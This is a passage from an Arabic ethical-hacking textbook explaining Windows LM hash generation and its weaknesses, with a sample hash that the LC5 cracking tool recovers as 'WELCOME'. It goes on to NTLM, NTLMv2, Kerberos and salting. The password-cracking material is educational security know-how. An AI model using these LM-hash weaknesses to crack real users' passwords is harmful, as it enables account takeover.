‫إذا ً‪ ،‬إذا ﻛﺎﻧت ﻛﻠﻣﺔ اﻟﻣرور ﻋﺑﺎره ﻋن ‪ 7‬أﺣرف او اﻗل‪ ،‬ﻓﺈن اﻟﻧﺻف اﻟﺛﺎﻧﻲ ھو داﺋﻣﺎ‪ . oxAAD3B435BS1404EE‬ﻋﻧدﻣﺎ ﯾﺗم اﺳﺗﺧدام‬
‫ﻛﻠﻣﺎت اﻟﻣرور ‪ ،LM‬ﻓﻣن اﻟﺳﮭل ﻋﻠﻰ ﻣﮭﺎﺟﻣﻲ ﻛﻠﻣﺎت اﻟﻣرور اﻟﻛﺷف ﻋن اﻟﺣروف اﻟﺛﺎﻣﻧﺔ‪ ،‬إذا ﻛﺎن ﻣوﺟودا‪ .‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬إذا ﻛﺎن‬
‫اﻟﻣﺳﺗﺧدم ﻟدﯾﮫ ﻛﻠﻣﺔ ﻣرور ﻟﮭﺎش ‪ LM‬ﻣن‪ ، OxC23413A8A1E7665f AAD3B435B51404EE‬ﻓﺎن ﺗطﺑﻖ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور‬
‫‪ LC5‬ﯾﻛﺷف ﻋن ﻛﻠﻣﺔ اﻟﺳر ﺑﺎﺳم " ‪ " WELCOME‬ﻣﻊ اﻟﻘﻠﯾل ﺟدا ﻣن اﻟﺟﮭد‪.‬‬
‫ﻟﺣﺳن اﻟﺣظ‪ ،‬واﺟﮭت ﻣﺎﯾﻛروﺳوﻓت ھذه اﻟﻘﺿﺎﯾﺎ واﺳﺗﺧدﻣت اﻵن ﺧوارزﻣﯾﺔ أﻛﺛر أﻣﻧﺎ ودﻋت ﻹﻧﺷﺎء ھﺎش ﻣن اﻟﻧوع ‪ NTLM‬ﻟﻛﻠﻣﺔ اﻟﻣرور‬
‫اﻟﺧﺎﺻﺔ ﺑﮫ‪ .‬وﻣﻊ ذﻟك‪ ،‬ﻓﺎن ﻣﺧﺗﺑر اﻻﺧﺗراق‪ ،‬ﺳوف ﻻ ﯾزال ﯾﺟد اﻟﻧظم اﻟﺗﻲ ﻣﺎ زاﻟت ﺗﺳﺗﺧدم وﺗﺧزن ‪ .LM hash‬اﻹﺻدارات اﻟﺣدﯾﺛﺔ ﻣن‬
‫وﯾﻧدوز ﻻ ﺗﺳﺗﺧدم أو ﺗﺧزﯾن ‪ LM hash‬اﻓﺗراﺿﯾﺎ؛ وﺣﺗﻰ ﻣﻊ ذﻟك‪ ،‬ھﻧﺎك ﺧﯾﺎرات ﻟﺗﻣﻛﯾن ‪ LM hash‬ﻋﻠﻰ ھذه اﻷﻧظﻣﺔ‪ .‬وﯾﺗم ﺗﻧﻔﯾذ ھذه‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪316‬‬

‫"اﻟﻣﯾزة" ﻟدﻋم اﻟﺗواﻓﻖ ﻣﻊ اﻟﻧظم اﻟﻘدﯾﻣﺔ‪ .‬ﻛﻣﻼﺣظﺔ ﺟﺎﻧﺑﯾﺔ‪ ،‬ﯾﺟب ﻋﻠﯾك داﺋﻣﺎ اﻟﺗرﻗﯾﺔ‪ ،‬أو اﻟﺗوﻗف ﻋن اﺳﺗﺧدام أي ﻣن اﻟﺑراﻣﺞ اﻟﺗﻲ ﺗطﻠب ﻣﻧك‬
‫اﺳﺗﺧدام ‪ .LM hash‬اﻷﻧظﻣﺔ اﻟﻘدﯾﻣﺔ ﻏﺎﻟﺑﺎ ﻣﺎ ﺗﺿﻊ اﻟﺷﺑﻛﺔ ﺑﺄﻛﻣﻠﮭﺎ ﻟﻠﺧطر‪.‬‬

‫ﻛﻠﻣﺔ اﻟﻣرور ‪ LAN Manager OWF‬ﻗد ﺗﺻل اﻟﻰ ‪ 16‬ﺑﺎﯾت ﻋﻛس ‪ LM‬اﻟﻌﺎدﯾﺔ اﻟﺗﻲ ﺗﺻل اﻟﻰ ‪ 14‬ﺑﺎﯾت ﻓﻘط‪ .‬ﺣﯾث ‪ 7‬أﺣرف ﻣن ﻛﻠﻣﺔ‬
‫اﻟﻣرور اﻷوﻟﻰ ﺗﺳﺗﺧدم ﻹﻧﺷﺎء ‪ 8‬ﺑﺎﯾت اﻷوﻟﻰ ﻣن ‪ LAN Manager OWF‬وﺗﺳﺗﺧدم ‪ 7‬أﺣرف اﻟﺛﺎﻧﯾﺔ ﻣن ﻛﻠﻣﺔ اﻟﻣرور ﻓﻲ إﻧﺷﺎء ‪ 8‬ﺑﺎﯾت‬
‫ﻣن ‪.LAN Manager OWF‬‬

‫‪ NTLMv2‬ھو ﺑروﺗوﻛول ﻣﺻﺎدﻗﺔ اﻟﺗوﺛﯾﻖ‪/‬اﻻﺳﺗﺟﺎﺑﺔ)‪ (challenge/response authentication‬واﻟﺗﻲ ﺗﻘدم ﺗﺣﺳن ﻟﻸوﺿﺎع اﻷﻣﻧﯾﺔ‬
‫ﻋﺑر ﺑروﺗوﻛول ‪ LM‬اﻟﺗﻲ ﻋﻔﺎ ﻋﻠﯾﮭﺎ اﻟزﻣن‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﻓﺈن ھذه اﻟﻧظم ﻟدﯾﮭﺎ ﻣﺳﺗوى ﻟﺿﺑط ﻣﺻﺎدﻗﺔ ‪ LAN Manager‬إﻟﻰ‬
‫‪.Send NTLMv2 responses only‬‬
‫ﻣﺜﺎل أﺧﺮ ﻹﻧﺸﺎء ھﺎش ‪(LM“Hash” Generation) LM‬‬

‫‪ LM hash‬ﯾطﻠﻖ ﻋﻠﯾﮫ أﯾﺿﺎ ﺑﺎﺳم ‪ LAN Manager Hash‬ﯾﺳﺗﺧدم ﻣن ﻗﺑل اﻟﻌدﯾد ﻣن إﺻدارات ﻧظم اﻟﺗﺷﻐﯾل ‪ Windows‬ﻟﺗﺧزﯾن‬
‫ﻛﻠﻣﺎت اﻟﺳر اﻟﺗﻲ ھﻲ أﻗل ﻣن ‪ 15‬ﺣرﻓﺎ‪ .‬وﯾوﺿﺢ اﻟﺷﻛل اﻟﺗﺎﻟﻲ ﻋﻣﻠﯾﺔ ﺗوﻟﯾد ‪ LM Hash‬ﻛﻠﻣﺔ ﻣرور اﻟﻣﺳﺗﺧدم)‪. (cehpass1‬‬

‫ﻓﻲ ﻋﻣﻠﯾﺔ ﺗوﻟﯾد ‪ LM‬ھﺎش‪ ،‬أوﻻ ﯾﺗم ﺗﺣوﯾل أﺣرف اﻟﻛﻠﻣﺔ إذا ﻛﺎﻧت ﺻﻐﯾره إﻟﻰ أﺣرف ﻛﺑﯾرة؛ ﻓﻲ ھذا اﻟﻣﺛﺎل‪ ،‬ﯾﻛون ﻧﺗﺎﺋﺞ ھذه اﻟﻌﻣﻠﯾﺔ‬
‫"‪ ."CEHPASS1‬ﺛم‪ ،‬ﺑﻌد ذﻟك اﻟﻧﺎﺗﺞ‪ ،‬أي ‪ ،CEHPASS1‬ﯾﻘوم ﺑﺗﻘﺳﯾﻣﮫ إﻟﻰ ﻗﺳﻣﯾن ﻛل ﻗﺳم ﻋﺑﺎره ﻋن ﺳﺑﻊ ﺳﻼﺳل اﻷﺣرف؛ ﻓﻲ ھذا‬
‫اﻟﻣﺛﺎل‪ ،‬ﻓﺎن اﻟﻧﺎﺗﺞ ﯾﻛون" ‪" CEHPASS‬و" ******‪" 1‬ﺣﯾث ﯾﺣﺗوي اﻟﺳﻠﺳﻠﺔ اﻟﺛﺎﻧﯾﺔ ﺣرف واﺣد ﻓﻘط‪ .‬ﻟﺟﻌل اﻟﺳﻠﺳﻠﺔ اﻟﺛﺎﻧﯾﺔ ﺳﻠﺳﻠﺔ ﺳﺑﻌﺔ‬
‫أﺣرف‪ ،‬ﻧﻘوم ﺑﺗطوﯾﻠﮭﺎ ﻣﻊ اﻷﺣرف ﻓﺎرﻏﺔ‪ ،‬ﺛم ﯾﺗم اﺳﺗﺧدام ﺳﻼﺳل اﻟﺳﺑﻌﺔ أﺣرف اﻻﺛﻧﯾن ﻛﻣﻔﺗﺎح ﺗﺷﻔﯾر ﻟﺗﺷﻔﯾر اﻟﻣﺣﺗوى ﺑﺎﺳﺗﺧدام ﺗﺷﻔﯾر‬
‫‪ (Digital Encryption Standard) DES‬اﻟﺷﻔرات اﻟﻣﺗﻣﺎﺛﻠﺔ)‪ . (symmetric cipher‬وأﺧﯾرا‪ ،‬ﻹﻧﺷﺎء ھﺎش ‪ ،LM‬ذﻟك ﻋن طرﯾﻖ‬
‫رﺑطﮭﻣﺎ ﺑﺑﻌض )‪ (DES-encryption‬ﻟﯾﺻﺑﺣﺎ ﻣﺗﺳﻠﺳﻠﯾن‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪317‬‬

‫‪LM, NTLMv1, and NTLMv2‬‬

‫ﻟﻣﻌﺎﻟﺟﺔ اﻟﻣﺷﺎﻛل اﻟﻣوﺟودة ﻓﻲ ‪ ،NTLM1‬ﻋرﺿت ﺷرﻛﺔ ﻣﺎﯾﻛروﺳوﻓت ‪ NTLM‬اﻹﺻدار ‪ ،2‬ودﻋت اﺳﺗﺧداﻣﮭﺎ ﻛﻠﻣﺎ ﻛﺎن ذﻟك ﻣﻣﻛﻧﺎ‪.‬‬
‫ﯾﺳرد اﻟﺟدول اﻟﺗﺎﻟﻲ اﻟﻣﯾزات ﻣن أﺳﺎﻟﯾب اﻟﻣﺻﺎدﻗﺔ اﻟﺛﻼﺛﺔ‪.‬‬

‫‪NTLM Authentication‬‬

‫)‪ NTLM (NT LAN Manager‬ھو ﺑروﺗوﻛول اﻟﻣﺻﺎدﻗﺔ اﻟﻣﺳﺗﺧدﻣﺔ ﻓﻲ اﻟﺷﺑﻛﺎت اﻟﺗﻲ ﺗﺗﺿﻣن أﻧظﻣﺔ ﺗﺷﻐﯾل ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ‪،‬‬
‫وﻋﻠﻰ اﻷﻧظﻣﺔ اﻟﻣﺳﺗﻘﻠﺔ‪ .‬وﻣن ﻗﺑل اﻟﻌدﯾد ﻣن ﻣﻧﺗﺟﺎت ﻣﺎﯾﻛروﺳوﻓت ﻹﺟراء ﻣﺻﺎدﻗﺔ )‪ ،(challenge/response‬وھو ﻧظﺎم اﻟﻣﺻﺎدﻗﺔ‬
‫اﻻﻓﺗراﺿﻲ اﻟذي ﯾﺳﺗﺧدﻣﮫ ﺟدار ﺣﻣﺎﯾﺔ ﻣﺎﯾﻛروﺳوﻓت وﻣﻧﺗﺟﺎت ﺧﺎدم اﻟﺑروﻛﺳﻲ‪ .‬وﻗد ﺗم ﺗطوﯾر ھذا اﻟﺑرﻧﺎﻣﺞ ﻟﻣﻌﺎﻟﺟﺔ ﻣﺷﺎﻛل اﻟﻌﻣل ﻣﻊ ﺗﻘﻧﯾﺎت‬
‫ﺟﺎﻓﺎ ﻓﻲ ﺑﯾﺋﺔ ‪ .Microsoft‬وﻧظرا ﻷﻧﮫ ﻻ ﯾوﺟد أي ﻣن ﻣواﺻﻔﺎت اﻟﺑروﺗوﻛول اﻟرﺳﻣﻲ‪ ،‬ﻓﻠﯾس ھﻧﺎك ﻣﺎ ﯾﺿﻣن أﻧﮫ ﯾﻌﻣل ﺑﺷﻛل ﺻﺣﯾﺢ ﻓﻲ‬
‫ﻛل ﺣﺎﻟﺔ‪ .‬ﻓﻘد ﻛﺎن ﻋﻠﻰ ﺑﻌض ﻣن ﻣﻧﺗﺟﺎت وﯾﻧدوز‪ ،‬ﺣﯾث ﻋﻣل ﺑﻧﺟﺎح‪.‬‬
‫ﯾﺿﯾف ‪ Microsoft Kerberos‬ﺣزﻣﺔ أﻣﺎن أﻛﺑر أﻣﺎﻧﺎ ً ﻣن أﻧظﻣﺔ ‪ NTLM‬ﻋﻠﻰ ﺷﺑﻛﺔ اﻻﺗﺻﺎل‪ .‬ﻋﻠﻰ اﻟرﻏم ﻣن أن ‪Microsoft‬‬
‫‪ Kerberos‬ھو ﺑروﺗوﻛول اﻻﺧﺗﯾﺎر‪ ،‬ﻟﻛن ﻻ ﯾزال ﯾﺗم دﻋم ‪ .NTLM‬ﯾﺟب أﯾﺿﺎ اﺳﺗﺧدام ‪ NTLM‬ﻟﻣﺻﺎدﻗﺔ ﺗﺳﺟﯾل اﻟدﺧول ﻋﻠﻰ اﻷﻧظﻣﺔ‬
‫اﻟﻣﺳﺗﻘﻠﺔ‪.‬‬
‫ﺑﯾﺎﻧﺎت اﻋﺗﻣﺎد ‪ NTLM‬ﺗﺳﺗﻧد إﻟﻰ اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﺗم اﻟﺣﺻول ﻋﻠﯾﮭﺎ أﺛﻧﺎء ﻋﻣﻠﯾﺔ ﺗﺳﺟﯾل اﻟدﺧول‪ ،‬وﺗﺗﺄﻟف ﻣن اﺳم اﻟدوﻣﯾن واﺳم اﻟﻣﺳﺗﺧدم‪،‬‬
‫وھﺎش ﻛﻠﻣﺔ ﻣرور اﻟﻣﺳﺗﺧدم ذات اﻻﺗﺟﺎه اﻟواﺣد‪ .‬ﯾﺳﺗﺧدم ‪ NTLM‬ﺑروﺗوﻛول )‪ (challenge/response‬اﻟﻣﺷﻔر ﻟﻣﺻﺎدﻗﺔ ﻣﺳﺗﺧدم دون‬
‫إرﺳﺎل ﻛﻠﻣﺔ ﻣرور اﻟﻣﺳﺗﺧدم ﻋﺑر اﻟﺳﻠك‪ .‬ﺑدﻻً ﻣن ذﻟك‪ ،‬ﻧظﺎم طﻠب اﻟﻣﺻﺎدﻗﺔ ﯾﺟب إﺟراء ﻋﻣﻠﯾﺔ ﺣﺳﺎﺑﯾﺔ اﻟﺗﻲ ﺗﺛﺑت أن ﻟدﯾﮭﺎ إﻣﻛﺎﻧﯾﺔ اﻟوﺻول‬
‫إﻟﻰ ﺑﯾﺎﻧﺎت اﻋﺗﻣﺎد ‪ NTLM‬اﻟﻣﺿﻣون‪.‬‬
‫ﯾﺗﻛون ‪ NTLM authentication‬ﻣن ﺑروﺗوﻛوﻟﯾن‪ NTLM authentication protocol :‬و‪ .LM authentication protocol‬ھذه‬
‫اﻟﺑروﺗوﻛوﻻت ﺗﺳﺗﺧدم ﻣﻧﮭﺟﯾﺔ ھﺎش ﻣﺧﺗﻠﻔﺔ ﻟﺗﺧزﯾن ﻛﻠﻣﺎت ﻣرور اﻟﻣﺳﺗﺧدﻣﯾن ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ‪.SAM‬‬
‫‪NTLM Authentication Protocol‬‬

‫اﻟﻣﻧﺗﺟﺎت اﻟﺗﻲ ﯾدﻋﻣﮭﺎ ﺑروﺗوﻛول ‪ NTML‬ﺗم ﻧﺷرھﺎ ﻓﻘط ﻣن ﻗﺑل ﻣﺎﯾﻛروﺳوﻓت ﺑﺳﺑب ﻋدم ﺗواﻓر اﻟﻣواﺻﻔﺎت اﻟرﺳﻣﯾﺔ ﻟﻠﺑروﺗوﻛول‪.‬‬
‫ﻧﺗﯾﺟﺔ ﻟذﻟك‪ ،‬ﻓﻲ ﺑﯾﺋﺔ ﺷﺑﻛﺔ اﺗﺻﺎل‪ ، Microsoft‬ﻓﺄن اﻟﻣﻧﺗﺟﺎت اﻷﺧرى )‪ (non-MS product‬ﻛﻠﮭﺎ ﺗﻘرﯾﺑﺎ ﺗﺟد ﺻﻌوﺑﺔ ﻓﻲ أداء ﻣﮭﺎﻣﮭﺎ‬
‫ﺑﺷﻛل ﺻﺣﯾﺢ‪ .‬أﯾﺿﺎ ﻓﻲ ﺑﯾﺋﺎت ﺗطوﯾر اﻟﺑرﻣﺟﯾﺎت ﺗﻌﺎﻧﻲ ﻣن ﻧﻔس اﻟﻣﺷﻛﻠﺔ؛ ﻻ ﺗوﺟد ﻣﻠﻔﺎت ﻣﻛﺗﺑﺎت )‪(libraries‬اﻟﺗﻲ ﺗﻧﻔذ ھذا اﻟﻣﺧطط‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪318‬‬

‫واﻟﺗوﺛﯾﻖ‪ ،‬ﻣﺎ ﻋدا ﺗﻠك اﻟﻣﺟﻣﻌﺔ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز‪ .‬ﻓﻲ ﻣﺟﺗﻣﻊ اﻟﻣﺻدر اﻟﻣﻔﺗوح‪ ،‬ھﻧﺎك اﻟﻌدﯾد ﻣن اﻟﻣﺷﺎرﯾﻊ اﻟﺗﻲ ﺗرﻛز ﻋﻠﻰ ﺗﻧﻔﯾذ ھذا‬
‫اﻟﺑروﺗوﻛول‪ ،‬وﻟﻛن ﻣﻌظم ھذه ﺗﻣﻠك ﺟﺎﻓﺎ ﻛﺑﯾﺋﺔ ﻟﮭﺎ‪.‬‬
‫ﻋدم ﺗواﻓر ﻣﺧطط اﻟﻣﺻﺎدﻗﺔ ﻓﻲ ﻣﻧﺻﺔ اﻟﺟﺎﻓﺎ ﯾﻣﻛن أن ﯾﺳﺑب ﻣﺷﺎﻛل ﺧطﯾرة ﻓﻲ ﻣﺟﺎل ﺗطوﯾر وﻧﺷر اﻟﺗطﺑﯾﻘﺎت اﻟﺗﻌﺎوﻧﯾﺔ اﻟﺗﻲ ﺗﻌﺗﻣد ﻋﻠﻰ‬
‫ﺗﻘﻧﯾﺎت ﻣﺛل ﺧدﻣﺎت اﻟوﯾب ‪ SOAP‬اﻟﺗﻲ ﺗﻌﺗﻣد ﻋﻠﻰ ﺑروﺗوﻛول ‪.HTTP‬‬

‫ﻣﺻﺎدﻗﺔ ‪ (NTLM Authentication) NTLM‬ھو ﻣﺧطط )‪ ،(challenge/response‬ﯾﺗﻛون ﻣن ﺛﻼث رﺳﺎﺋل‪ ،‬ﯾﺷﺎر إﻟﯾﮫ ﻋﺎدة‬
‫ﻛﺎﻟﻧوع ‪) 1‬اﻟﺗﻔﺎوض]‪ ،([negotiation‬واﻟﻧوع ‪) 2‬اﻟﺗﺣدي]‪ ([challenge‬وﻧوع ‪) 3‬اﻟﻣﺻﺎدﻗﺔ]‪ .([authentication‬وھﻲ ﺗﻌﻣل أﺳﺎﺳﺎ‬
‫ﻣﺛل ھذا‪:‬‬
‫‪ -1‬ﯾرﺳل اﻟﻌﻣﯾل رﺳﺎﻟﺔ اﻟﻧوع ‪ 1‬إﻟﻰ اﻟﻣﻠﻘم‪ .‬أﺳﺎﺳﺎ ھذا ﯾﺣﺗوي ﻋﻠﻰ ﻗﺎﺋﻣﺔ ﺑﺎﻟﻣﯾزات اﻟﺗﻲ ﯾرﯾدھﺎ اﻟﻌﻣﯾل وطﻠﺑت ﻣن اﻟﺧﺎدم‪.‬‬
‫‪ -2‬اﻟﻣﻠﻘم ﯾﺳﺗﺟﯾب ﻣﻊ رﺳﺎﻟﺔ ﻧوع ‪ .2‬وھذا ﯾﺣﺗوي ﻋﻠﻰ ﻗﺎﺋﻣﺔ ﺑﺎﻟﻣﯾزات اﻟﻣﺗﻔﻖ ﻋﻠﯾﮭﺎ ﻣن ﻗﺑل اﻟﻣﻠﻘم‪ .‬اﻷھم ﻣن ذﻟك‪ ،‬وﻣﻊ ذﻟك‪ ،‬ﻓﺈﻧﮫ‬
‫ﯾﺣﺗوي ﻋﻠﻰ ‪ challenge‬واﻟذي ﺗم إﻧﺷﺎؤھﺎ ﺑواﺳطﺔ اﻟﻣﻠﻘم‪.‬‬
‫‪ -3‬اﻟﻌﻣﯾل ﯾﻘوم ﺑﺎﻟرد ﻋﻠﻰ ‪ challenge‬ﻣﻊ رﺳﺎﻟﺔ ﻧوع ‪ .3‬وھذا ﯾﺣﺗوي ﻋﻠﻰ ﻋدة أﺟزاء ﻣن اﻟﻣﻌﻠوﻣﺎت ﺣول اﻟﻌﻣﯾل‪ ،‬ﺑﻣﺎ ﻓﻲ ذﻟك‬
‫اﻟدوﻣﯾن واﺳم اﻟﻣﺳﺗﺧدم ﻟﻠﻣﺳﺗﺧدم اﻟﻌﻣﯾل‪.‬‬
‫‪NTLM Authentication Process‬‬

‫ﯾﺗﺿﻣن ‪ NTLM‬ﺛﻼﺛﺔ أﺳﺎﻟﯾب ﻣن )‪ ،NTLMv1 ،LM :(challenge/response authentication‬و‪ .NTLMv2‬ﻋﻣﻠﯾﺔ‬


‫اﻟﻣﺻﺎدﻗﺔ ﻟﺟﻣﯾﻊ اﻷﺳﺎﻟﯾب ھﻲ ﻧﻔﺳﮭﺎ‪ .‬واﻟﻔرق اﻟوﺣﯾد ﺑﯾﻧﮭم ھو ﻣﺳﺗوى اﻟﺗﺷﻔﯾر‪ .‬ﻓﻲ ﻣﺻﺎدﻗﺔ ‪ ،NTLM‬اﻟﻌﻣﯾل واﻟﺧﺎدم ﯾﺗﻔﺎوﺿوا ﻋﻠﻰ‬
‫ﺑروﺗوﻛول اﻟﻣﺻﺎدﻗﺔ‪ .‬وﯾﺗم إﻧﺟﺎز ھذا ﻣن ﺧﻼل)‪. Microsoft negotiated Security Support Provider (SSP‬‬

‫ﻋﻣﻠﯾﺔ ﻣﺻﺎدﻗﺔ اﻟﻌﻣﯾل إﻟﻰ وﺣدة ﺗﺣﻛم اﻟدوﻣﯾن ﺑﺎﺳﺗﺧدام أي ﻣن ﺑروﺗوﻛوﻻت ‪ NTLM‬ﺗظﮭر ﻣن ﺧﻼل اﻟﺧطوات اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫ﯾﻘوم اﻟﻌﻣﯾل ﺑﻛﺗﺎﺑﺔ اﺳم اﻟﻣﺳﺗﺧدم وﻛﻠﻣﺔ اﻟﻣرور ﻓﻲ إطﺎر ﺗﺳﺟﯾل اﻟدﺧول‪.‬‬ ‫‪o‬‬
‫ﯾﻘوم ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﺑﺗﺷﻐﯾل ﻛﻠﻣﺔ اﻟﻣرور ﻣن ﺧﻼل ﺧوارزﻣﯾﺔ اﻟﮭﺎش وﯾﻘوم ﺑﺈﻧﺷﺎء اﻟﮭﺎش ﻟﻛﻠﻣﺔ اﻟﻣرور اﻟذي ﺗم إدﺧﺎﻟﮫ ﻣن‬ ‫‪o‬‬
‫ﺧﻼل إطﺎر ﺗﺳﺟﯾل اﻟدﺧول‪.‬‬
‫ﻛﻣﺑﯾوﺗر اﻟﻌﻣﯾل ﯾﻘوم ﺑﺈرﺳﺎل طﻠب ﺗﺳﺟﯾل اﻟدﺧول ﺟﻧﺑﺎ إﻟﻰ ﺟﻧب ﻣﻊ اﺳم اﻟدوﻣﯾن إﻟﻰ وﺣدة ﺗﺣﻛم اﻟدوﻣﯾن‪.‬‬ ‫‪o‬‬
‫وﺣدة ﺗﺣﻛم اﻟدوﻣﯾن ﯾوﻟد ﺳﻠﺳﻠﺔ أﺣرف ﻋﺷواﺋﯾﺔ ‪ 16‬ﺑﺎﯾت ﯾﺳﻣﻰ "‪ "nonce‬وﯾرﺳﻠﮭﺎ إﻟﻰ ﺟﮭﺎز ﻛﻣﺑﯾوﺗر اﻟﻌﻣﯾل‪.‬‬ ‫‪o‬‬
‫ﻛﻣﺑﯾوﺗر اﻟﻌﻣﯾل ﯾﻘوم ﺑﺗﺷﻔﯾر ‪ nonce‬ﻣﻊ ھﺎش ﻛﻠﻣﺔ ﻣرور اﻟﻣﺳﺗﺧدم وإرﺳﺎﻟﮫ إﻟﻰ وﺣدة ﺗﺣﻛم اﻟدوﻣﯾن‪.‬‬ ‫‪o‬‬
‫وﺣدة ﺗﺣﻛم اﻟدوﻣﯾن ﺗﺳﺗرد ھﺎش ﻛﻠﻣﺔ ﻣرور اﻟﻣﺳﺗﺧدم ﻣن ‪ SAM‬وﯾﺳﺗﺧدم ﻟﺗﺷﻔﯾر ‪ .nonce‬وﺣدة ﺗﺣﻛم اﻟدوﻣﯾن ﯾﻘﺎرن اﻟﻘﯾﻣﺔ‬ ‫‪o‬‬
‫اﻟﻣﺷﻔرة ﻣﻊ اﻟﻘﯾﻣﺔ اﻟواردة ﻣن اﻟﻌﻣﯾل‪ .‬إذا ﺗطﺎﺑﻘت اﻟﻘﯾم‪ ،‬ﻓﺗﻧﺟﺢ ﻣﺻﺎدﻗﺔ اﻟﻌﻣﯾل وﺗﺳﺟﯾل اﻟدﺧول‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪319‬‬

‫‪Kerberos‬‬

‫‪ Kerberos‬ھو ﺑروﺗوﻛول ﻣﺻﺎدﻗﺔ اﻟﺷﺑﻛﺔ)‪ . (network authentication protocol‬وھﻲ ﻣﺻﻣﻣﺔ ﻟﺗوﻓﯾر ﻣﺻﺎدﻗﺔ ﻗوﯾﺔ ﻟﻠﺗطﺑﯾﻘﺎت‬
‫اﻟﻌﻣﯾل‪/‬اﻟﺧﺎدم ﺑﺎﺳﺗﺧدام ‪ .secret-key cryptography‬وھذا ﯾوﻓر اﻟﻣﺻﺎدﻗﺔ اﻟﻣﺗﺑﺎدﻟﺔ‪ .‬ﺣﯾث ﻛل ﻣن اﻟﺧﺎدم واﻟﻣﺳﺗﺧدم ﯾﺗﺣﻘﻘﺎ ﻣن ھوﯾﺔ ﻛل‬
‫ﻣﻧﮭﻣﺎ اﻵﺧر‪ .‬اﻟرﺳﺎﺋل اﻟﻣرﺳﻠﺔ ﻣن ﺧﻼل ﺑروﺗوﻛول ‪ Kerberos‬ﻣﺣﻣﯾﺔ ﺿد ھﺟﻣﺎت إﻋﺎدة اﻟﺗﺷﻐﯾل واﻟﺗﻧﺻت‪.‬‬
‫‪ Kerberos‬ﯾﺟﻌل ﻣن اﺳﺗﺧدام )‪) Key Distribution Center (KDC‬ﺧﺎدم ﻟﺗوزﯾﻊ اﻟﻣﻔﺎﺗﯾﺢ( ‪ ،‬طرف ﺛﺎﻟث ﻣوﺛوق ﺑﮫ‪ .‬ھذا ﯾﺗﻛون ﻣن‬
‫ﻗﺳﻣﯾن ﻣﻧﻔﺻﻠﯾن ﻣﻧطﻘﯾﺎ‪ :‬ﺧﺎدم اﻟﻣﺻﺎدﻗﺔ ))‪ (Authentication server (AS‬وﺧﺎدم ﻣﻧﺢ اﻟﺗذاﻛر ))‪.(Ticket Granting Server (TGS‬‬
‫‪ Kerberos‬ﯾﻌﻣل ﻋﻠﻰ أﺳﺎس "اﻟﺗذاﻛر)‪ " (tickets‬ﻹﺛﺑﺎت ھوﯾﺔ اﻟﻣﺳﺗﺧدم‪.‬‬
‫آﻟﯾﺔ ﺗﻔوﯾض ‪ Kerberos‬ﺗﻌﺗﻣد ﻋﻠﻰ ﺗوﻓﯾر ﺗذﻛره ﻟﻠﻣﺳﺗﺧدم ﻣﻊ )‪ Ticket Granting Ticket (TGT‬اﻟذي ﯾﺧدم ﻣﺷﺎرﻛﺔ اﻟﻣﺻﺎدﻗﺔ‬
‫ﻟﻠوﺻول ﻻﺣﻘﺎ إﻟﻰ ﺧدﻣﺎت ﻣﻌﯾﻧﺔ‪ ،‬اﻟدﺧول اﻟﻣوﺣد اﻟذي ﻻ ﯾطﻠب ﻣن اﻟﻣﺳﺗﺧدم إﻋﺎدة إدﺧﺎل ﻛﻠﻣﺔ اﻟﻣرور ﻣرة أﺧرى ﻟﻠوﺻول إﻟﻰ أﯾﺔ ﻣن‬
‫اﻟﺧدﻣﺎت اﻟﺗﻲ ﯾؤذن ﻟﮭﺎ‪ .‬ﻣن اﻟﻣﮭم أن ﻧﻼﺣظ أﻧﮫ ﻟن ﯾﻛون ھﻧﺎك اﺗﺻﺎل ﻣﺑﺎﺷر ﺑﯾن ﺧوادم اﻟﺗطﺑﯾﻘﺎت وﻣرﻛز ﺗوزﯾﻊ اﻟﻣﻔﺎﺗﯾﺢ )‪(KDC‬‬
‫‪ Key Distribution Center‬؛ ﺧدﻣﺔ اﻟﺗذاﻛر‪ ،‬ﺣﺗﻰ ﻟو ﺗم ﺗﺣزﯾﻣﮭﺎ )‪ (packeted‬ﺑواﺳطﺔ ‪ ،TGS‬واﻟوﺻول إﻟﻰ اﻟﺧدﻣﺔ ﯾﻛون ﻓﻘط ﻣن‬
‫ﺧﻼل اﻟﻌﻣﯾل اﻟذى ﯾرﻏب ﻓﻲ اﻟوﺻول إﻟﯾﮭﺎ‪.‬‬

‫‪Salting‬‬

‫‪ Salting‬ھو وﺳﯾﻠﺔ ﻟﺟﻌل ﻛﻠﻣﺎت اﻟﻣرور أﻛﺛر أﻣﻧﺎ ﻋن طرﯾﻖ إﺿﺎﻓﺔ ﺳﻼﺳل ﻋﺷواﺋﯾﺔ ﻣن اﻟﺣروف إﻟﻰ ﻛﻠﻣﺎت اﻟﻣرور ﻗﺑل ﺣﺳﺎب ھﺎش‬
‫‪ MD5‬اﻟﺧﺎﺻﺔ ﺑﮭم‪ .‬وھذا ﯾﺟﻌل ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر أﺻﻌب‪ .‬ﻛﻠﻣﺎ زاد أطول اﻟﺳﻠﺳﻠﺔ اﻟﻌﺷواﺋﯾﺔ‪ ،‬ﻛﻠﻣﺎ ازدادت ﺻﻌوﺑﺔ ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر‪.‬‬
